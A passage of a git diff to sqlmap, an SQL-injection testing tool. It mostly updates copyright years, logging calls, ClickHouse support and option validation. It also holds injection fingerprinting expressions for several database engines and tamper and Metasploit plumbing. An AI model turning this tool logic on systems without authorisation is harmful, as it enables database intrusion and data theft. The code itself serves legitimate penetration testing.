readCachedFileContent(reqFile) @@ -5346,6 +5459,12 @@ def _parseBurpLog(content): if conf.scope: logger.info("using regular expression '%s' for filtering targets" % conf.scope) + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + for target in _parseBurpLog(content): yield target @@ -5472,3 +5591,28 @@ def chunkSplitPostData(data): retVal += "0\r\n\r\n" return retVal + +def checkSums(): + """ + Validate the content of the digest file (i.e. sha256sums.txt) + >>> checkSums() + True + """ + + retVal = True + + if paths.get("DIGEST_FILE"): + for entry in getFileItems(paths.DIGEST_FILE): + match = re.search(r"([0-9a-f]+)\s+([^\s]+)", entry) + if match: + expected, filename = match.groups() + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep) + if not checkFile(filepath, False): + continue + with open(filepath, "rb") as f: + content = f.read() + if not hashlib.sha256(content).hexdigest() == expected: + retVal &= False + break + + return retVal diff --git a/lib/core/compat.py b/lib/core/compat.py index 50d18695d16..7020f85c01e 100644 --- a/lib/core/compat.py +++ b/lib/core/compat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -12,6 +12,7 @@ import math import os import random +import re import sys import time import uuid @@ -167,8 +168,27 @@ def whseed(self, a=None): def patchHeaders(headers): if headers is not None and not hasattr(headers, "headers"): + if isinstance(headers, dict): + class _(dict): + def __getitem__(self, key): + for key_ in self: + if key_.lower() == key.lower(): + return super(_, self).__getitem__(key_) + + raise KeyError(key) + + def get(self, key, default=None): + try: + return self[key] + except KeyError: + return default + + headers = _(headers) + headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers] + return headers + def cmp(a, b): """ >>> cmp("a", "b") @@ -258,7 +278,37 @@ def __hash__(self): xrange = xrange buffer = buffer -try: - from pkg_resources import parse_version as LooseVersion -except ImportError: - from distutils.version import LooseVersion +def LooseVersion(version): + """ + >>> LooseVersion("1.0") == LooseVersion("1.0") + True + >>> LooseVersion("1.0.1") > LooseVersion("1.0") + True + >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1") + True + >>> LooseVersion("1.0.11") < LooseVersion("1.0.111") + True + >>> LooseVersion("foobar") > LooseVersion("1.0") + False + >>> LooseVersion("1.0") > LooseVersion("foobar") + False + >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3") + True + >>> LooseVersion("8.0.22-0ubuntu0.20.04.2") + 8.000022 + """ + + match = re.search(r"\A(\d[\d.]*)", version or "") + + if match: + result = 0 + value = match.group(1) + weight = 1.0 + for part in value.strip('.').split('.'): + if part.isdigit(): + result += int(part) * weight + weight *= 1e-3 + else: + result = float("NaN") + + return result diff --git a/lib/core/convert.py b/lib/core/convert.py index 4495f56a804..08594cdcfb6 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -16,6 +16,7 @@ import json import re import sys +import time from lib.core.bigarray import BigArray from lib.core.compat import xrange @@ -134,6 +135,23 @@ def dejsonize(data): return json.loads(data) +def rot13(data): + """ + Returns ROT13 encoded/decoded text + + >>> rot13('foobar was here!!') + 'sbbone jnf urer!!' + >>> rot13('sbbone jnf urer!!') + 'foobar was here!!' + """ + + # Reference: https://stackoverflow.com/a/62662878 + retVal = "" + alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ" + for char in data: + retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char + return retVal + def decodeHex(value, binary=True): """ Returns a decoded representation of provided hexadecimal value @@ -334,6 +352,10 @@ def getUnicode(value, encoding=None, noneToNull=False): True """ + # Best position for --time-limit mechanism + if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit): + raise SystemExit + if noneToNull and value is None: return NULL diff --git a/lib/core/data.py b/lib/core/data.py index f086df4dec0..5b46facd058 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index fab1fd1335e..159380e76c9 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,11 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import copy +import threading import types from thirdparty.odict import OrderedDict @@ -49,6 +50,19 @@ def __getattr__(self, item): else: return None + def __delattr__(self, item): + """ + Deletes attributes + """ + + try: + return self.pop(item) + except KeyError: + if self.keycheck: + raise AttributeError("unable to access item '%s'" % item) + else: + return None + def __setattr__(self, item, value): """ Maps attributes to values @@ -129,6 +143,7 @@ class LRUDict(object): def __init__(self, capacity): self.capacity = capacity self.cache = OrderedDict() + self.__lock = threading.Lock() def __len__(self): return len(self.cache) @@ -145,11 +160,12 @@ def get(self, key): return self.__getitem__(key) def __setitem__(self, key, value): - try: - self.cache.pop(key) - except KeyError: - if len(self.cache) >= self.capacity: - self.cache.popitem(last=False) + with self.__lock: + try: + self.cache.pop(key) + except KeyError: + if len(self.cache) >= self.capacity: + self.cache.popitem(last=False) self.cache[key] = value def set(self, key, value): diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 7ec5dbb6d43..cf68b1f4776 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index c1f4cd75bff..95762916124 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -16,7 +16,7 @@ "timeout": 30, "retries": 3, "csrfRetries": 0, - "saFreq": 0, + "safeFreq": 0, "threads": 1, "level": 1, "risk": 1, diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 01a46ae0f9b..c4043381cf8 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -38,6 +38,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import VERTICA_ALIASES from lib.core.settings import VIRTUOSO_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES FIREBIRD_TYPES = { 261: "BLOB", @@ -231,7 +232,7 @@ DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20http://jpype.sourceforge.net/", None), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20https://github.com/jpype-project/jpype", None), DBMS.H2: (H2_ALIASES, None, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.MONETDB: (MONETDB_ALIASES, "pymonetdb", "https://github.com/gijzelaerr/pymonetdb", "monetdb"), @@ -241,9 +242,10 @@ DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None), DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None), DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None), - DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), + DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None), + DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None), - DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20http://jpype.sourceforge.net/", None), + DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20https://github.com/jpype-project/jpype", None), DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None), DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None), DBMS.RAIMA: (RAIMA_ALIASES, None, None, None), @@ -267,8 +269,8 @@ HEURISTIC_NULL_EVAL = { DBMS.ACCESS: "CVAR(NULL)", DBMS.MAXDB: "ALPHA(NULL)", - DBMS.MSSQL: "DIFFERENCE(NULL,NULL)", - DBMS.MYSQL: "QUARTER(NULL)", + DBMS.MSSQL: "IIF(1=1,DIFFERENCE(NULL,NULL),0)", + DBMS.MYSQL: "QUARTER(NULL XOR NULL)", DBMS.ORACLE: "INSTR2(NULL,NULL)", DBMS.PGSQL: "QUOTE_IDENT(NULL)", DBMS.SQLITE: "UNLIKELY(NULL)", @@ -286,6 +288,7 @@ DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))", DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", + DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL", } SQL_STATEMENTS = { diff --git a/lib/core/dump.py b/lib/core/dump.py index d20584450e9..7b8fec61a19 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -79,18 +79,19 @@ def _write(self, data, newline=True, console=True, content_type=None): elif console: dataToStdout(text) - multiThreadMode = kb.multiThreadMode - if multiThreadMode: - self._lock.acquire() + if self._outputFP: + multiThreadMode = kb.multiThreadMode + if multiThreadMode: + self._lock.acquire() - try: - self._outputFP.write(text) - except IOError as ex: - errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) + try: + self._outputFP.write(text) + except IOError as ex: + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) - if multiThreadMode: - self._lock.release() + if multiThreadMode: + self._lock.release() kb.dataOutputFlag = True @@ -102,6 +103,10 @@ def flush(self): pass def setOutputFile(self): + if conf.noLogging: + self._outputFP = None + return + self._outputFile = os.path.join(conf.outputPath, "log") try: self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") @@ -407,7 +412,18 @@ def dbTableValues(self, tableValues): if conf.api: self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) - dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + try: + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + except UnicodeError: + try: + dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db))) + except (UnicodeError, OSError): + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "currently unable to use regular dump directory. " + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir if conf.dumpFormat == DUMP_FORMAT.SQLITE: replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) @@ -429,11 +445,11 @@ def dbTableValues(self, tableValues): warnMsg = "unable to create dump directory " warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex)) warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) + logger.warning(warnMsg) dumpDbPath = tempDir - dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) + dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) if not checkFile(dumpFileName, False): try: openFile(dumpFileName, "w+b").close() @@ -608,7 +624,7 @@ def dbTableValues(self, tableValues): _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) + logger.warning(warnMsg) with openFile(filepath, "w+b", None) as f: _ = safechardecode(value, True) @@ -656,7 +672,7 @@ def dbTableValues(self, tableValues): if not warnFile: logger.info(msg) else: - logger.warn(msg) + logger.warning(msg) def dbColumns(self, dbColumnsDict, colConsider, dbs): if conf.api: diff --git a/lib/core/enums.py b/lib/core/enums.py index 148c29647c2..7b096aefc8a 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -52,6 +52,7 @@ class DBMS(object): PRESTO = "Presto" ALTIBASE = "Altibase" MIMERSQL = "MimerSQL" + CLICKHOUSE = "ClickHouse" CRATEDB = "CrateDB" CUBRID = "Cubrid" CACHE = "InterSystems Cache" @@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object): PRESTO = "presto" ALTIBASE = "altibase" MIMERSQL = "mimersql" + CLICKHOUSE = "clickhouse" CRATEDB = "cratedb" CUBRID = "cubrid" CACHE = "cache" @@ -104,6 +106,8 @@ class FORK(object): YELLOWBRICK = "Yellowbrick" IRIS = "Iris" YUGABYTEDB = "YugabyteDB" + OPENGAUSS = "OpenGauss" + DM8 = "DM8" class CUSTOM_LOGGING(object): PAYLOAD = 9 diff --git a/lib/core/exception.py b/lib/core/exception.py index 9111888b006..3d4d97986c7 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/gui.py b/lib/core/gui.py index 0ee3219fa7a..024918a3457 100644 --- a/lib/core/gui.py +++ b/lib/core/gui.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -223,7 +223,7 @@ def enqueue(stream, queue): helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE)) helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE)) helpmenu.add_separator() - helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2021\n\n (%s)" % DEV_EMAIL_ADDRESS)) + helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2025\n\n (%s)" % DEV_EMAIL_ADDRESS)) menubar.add_cascade(label="Help", menu=helpmenu) window.config(menu=menubar) diff --git a/lib/core/log.py b/lib/core/log.py index fcd7e6f86f8..0d729fc9c20 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py index e23f51347b3..fd8eb0a951d 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -128,7 +128,6 @@ from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.threads import getCurrentThreadData @@ -416,6 +415,9 @@ def retrieve(): conf.googlePage += 1 def _setStdinPipeTargets(): + if conf.url: + return + if isinstance(conf.stdinPipe, _collections.Iterable): infoMsg = "using 'STDIN' for parsing targets list" logger.info(infoMsg) @@ -433,7 +435,7 @@ def __next__(self): def next(self): try: line = next(conf.stdinPipe) - except (IOError, OSError): + except (IOError, OSError, TypeError, UnicodeDecodeError): line = None if line: @@ -475,7 +477,7 @@ def _setBulkMultipleTargets(): if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _findPageForms(): if not conf.forms or conf.crawlDepth: @@ -523,7 +525,7 @@ def _findPageForms(): if not found: warnMsg = "no forms found" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setDBMSAuthentication(): """ @@ -607,16 +609,16 @@ def _setMetasploit(): warnMsg += "or more of the needed Metasploit executables " warnMsg += "within msfcli, msfconsole, msfencode and " warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) + logger.warning(warnMsg) else: warnMsg = "you did not provide the local path where Metasploit " warnMsg += "Framework is installed" - logger.warn(warnMsg) + logger.warning(warnMsg) if not msfEnvPathExists: warnMsg = "sqlmap is going to look for Metasploit Framework " warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") @@ -810,9 +812,10 @@ def _setTamperingFunctions(): raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ + priority = priority if priority is not None else PRIORITY.LOWEST for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": + if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"): found = True kb.tamperFunctions.append(function) function.__name__ = module.__name__ @@ -926,7 +929,7 @@ def _setPreprocessFunctions(): else: try: function(_urllib.request.Request("http://localhost/")) - except: + except Exception as ex: tbMsg = traceback.format_exc() if conf.debug: @@ -940,8 +943,8 @@ def _setPreprocessFunctions(): errMsg = "function 'preprocess(req)' " errMsg += "in preprocess script '%s' " % script - errMsg += "appears to be invalid " - errMsg += "(Note: find template script at '%s')" % filename + errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex) + errMsg += "You can find a template script at '%s'" % filename raise SqlmapGenericException(errMsg) def _setPostprocessFunctions(): @@ -1172,7 +1175,7 @@ def _setHTTPHandlers(): proxyString = "" proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} + proxyHandler.proxies = kb.proxies = {"http": proxyString, "https": proxyString} proxyHandler.__init__(proxyHandler.proxies) @@ -1202,10 +1205,10 @@ def _setHTTPHandlers(): if conf.proxy: warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) + logger.warning(warnMsg) elif conf.authType: warnMsg += "with authentication methods" - logger.warn(warnMsg) + logger.warning(warnMsg) else: handlers.append(keepAliveHandler) @@ -1358,7 +1361,7 @@ def _setHTTPAuthentication(): errMsg += "be in format 'DOMAIN\\username:password'" elif authType == AUTH_TYPE.PKI: errMsg = "HTTP PKI authentication require " - errMsg += "usage of option `--auth-pki`" + errMsg += "usage of option `--auth-file`" raise SqlmapSyntaxException(errMsg) aCredRegExp = re.search(regExp, conf.authCred) @@ -1402,7 +1405,10 @@ def _setHTTPExtraHeaders(): debugMsg = "setting extra HTTP headers" logger.debug(debugMsg) - conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n") + if "\n" in conf.headers: + conf.headers = conf.headers.replace("\r\n", "\n").split("\n") + elif "\\n" in conf.headers: + conf.headers = conf.headers.replace("\\r\\n", "\\n").split("\\n") for headerValue in conf.headers: if not headerValue.strip(): @@ -1547,7 +1553,7 @@ def _setHTTPTimeout(): if conf.timeout < 3.0: warnMsg = "the minimum HTTP timeout is 3 seconds, sqlmap " warnMsg += "will going to reset it" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.timeout = 3.0 else: @@ -1586,13 +1592,13 @@ def _createHomeDirectories(): if conf.get("outputDir") and context == "output": warnMsg = "using '%s' as the %s directory" % (directory, context) - logger.warn(warnMsg) + logger.warning(warnMsg) except (OSError, IOError) as ex: tempDir = tempfile.mkdtemp(prefix="sqlmap%s" % context) warnMsg = "unable to %s %s directory " % ("create" if not os.path.isdir(directory) else "write to the", context) warnMsg += "'%s' (%s). " % (directory, getUnicode(ex)) warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) + logger.warning(warnMsg) paths["SQLMAP_%s_PATH" % context.upper()] = tempDir @@ -1617,7 +1623,7 @@ def _createTemporaryDirectory(): tempfile.tempdir = conf.tmpDir warnMsg = "using '%s' as the temporary directory" % conf.tmpDir - logger.warn(warnMsg) + logger.warning(warnMsg) except (OSError, IOError) as ex: errMsg = "there has been a problem while accessing " errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) @@ -1632,7 +1638,7 @@ def _createTemporaryDirectory(): warnMsg += "make sure that there is enough disk space left. If problem persists, " warnMsg += "try to set environment variable 'TEMP' to a location " warnMsg += "writeable by the current user" - logger.warn(warnMsg) + logger.warning(warnMsg) if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: try: @@ -1693,11 +1699,20 @@ def _cleanupOptions(): try: conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)] except ValueError: - errMsg = "options '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD + errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD raise SqlmapSyntaxException(errMsg) else: conf.ignoreCode = [] + if conf.abortCode: + try: + conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)] + except ValueError: + errMsg = "option '--abort-code' should contain a list of integer values" + raise SqlmapSyntaxException(errMsg) + else: + conf.abortCode = [] + if conf.paramFilter: conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())] else: @@ -1789,6 +1804,9 @@ def _cleanupOptions(): conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None break + if conf.uValues: + conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(',')) + if conf.testFilter: conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter) @@ -1832,13 +1850,22 @@ class _(six.text_type): warnMsg = "increasing default value for " warnMsg += "option '--time-sec' to %d because " % conf.timeSec warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if conf.retries: conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) + if conf.url: + match = re.search(r"\A(\w+://)?([^/@?]+)@", conf.url) + if match: + credentials = match.group(2) + conf.url = conf.url.replace("%s@" % credentials, "", 1) + + conf.authType = AUTH_TYPE.BASIC + conf.authCred = credentials if ':' in credentials else "%s:" % credentials + if conf.code: conf.code = int(conf.code) @@ -2036,6 +2063,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] kb.dep = None kb.disableHtmlDecoding = False + kb.disableShiftTable = False kb.dnsMode = False kb.dnsTest = None kb.docRoot = None @@ -2066,6 +2094,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.headersFp = {} kb.heuristicDbms = None kb.heuristicExtendedDbms = None + kb.heuristicCode = None kb.heuristicMode = False kb.heuristicPage = False kb.heuristicTest = None @@ -2084,7 +2113,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "connError", "count", "handlers", "hint", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "handlers", "hint", "identYwaf", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None @@ -2116,13 +2145,16 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.pageStable = None kb.partRun = None kb.permissionFlag = False + kb.place = None kb.postHint = None kb.postSpaceToPlus = False kb.postUrlEncode = True kb.prependFlag = False kb.processResponseCounter = 0 kb.previousMethod = None + kb.processNonCustom = None kb.processUserMarks = None + kb.proxies = None kb.proxyAuthHeader = None kb.queryCounter = 0 kb.randomPool = {} @@ -2144,6 +2176,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.smokeMode = False kb.reduceTests = None kb.sslSuccess = False + kb.startTime = time.time() kb.stickyDBMS = False kb.suppressResumeInfo = False kb.tableFrom = None @@ -2155,7 +2188,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.testType = None kb.threadContinue = True kb.threadException = False - kb.tlsSNI = {} kb.uChar = NULL kb.udfFail = False kb.unionDuplicates = False @@ -2196,7 +2228,7 @@ def _useWizardInterface(): while not conf.url: message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) + conf.url = readInput(message, default=None, checkBatch=False) message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) conf.data = readInput(message, default=None) @@ -2207,7 +2239,7 @@ def _useWizardInterface(): if not conf.crawlDepth and not conf.forms: warnMsg += "Will search for forms" conf.forms = True - logger.warn(warnMsg) + logger.warning(warnMsg) choice = None @@ -2463,7 +2495,7 @@ def _setTorHttpProxySettings(): warnMsg += "Tor anonymizing network because of " warnMsg += "known issues with default settings of various 'bundles' " warnMsg += "(e.g. Vidalia)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" @@ -2543,7 +2575,7 @@ def _basicOptionValidation(): if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable" - logger.warn(warnMsg) + logger.warning(warnMsg) if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: @@ -2553,12 +2585,16 @@ def _basicOptionValidation(): if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)): warnMsg = "usage of switch '--random-agent' is strongly recommended when " warnMsg += "using option '--proxy-file'" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.uValues and conf.uChar: + errMsg = "option '--union-values' is incompatible with option '--union-char'" + raise SqlmapSyntaxException(errMsg) + if conf.base64Parameter and conf.tamper: errMsg = "option '--base64' is incompatible with option '--tamper'" raise SqlmapSyntaxException(errMsg) @@ -2642,13 +2678,31 @@ def _basicOptionValidation(): raise SqlmapSyntaxException(errMsg) if conf.paramExclude: + if re.search(r"\A\w+,", conf.paramExclude): + conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(','))) + try: re.compile(conf.paramExclude) except Exception as ex: errMsg = "invalid regular expression '%s' ('%s')" % (conf.paramExclude, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) - if conf.cookieDel and len(conf.cookieDel): + if 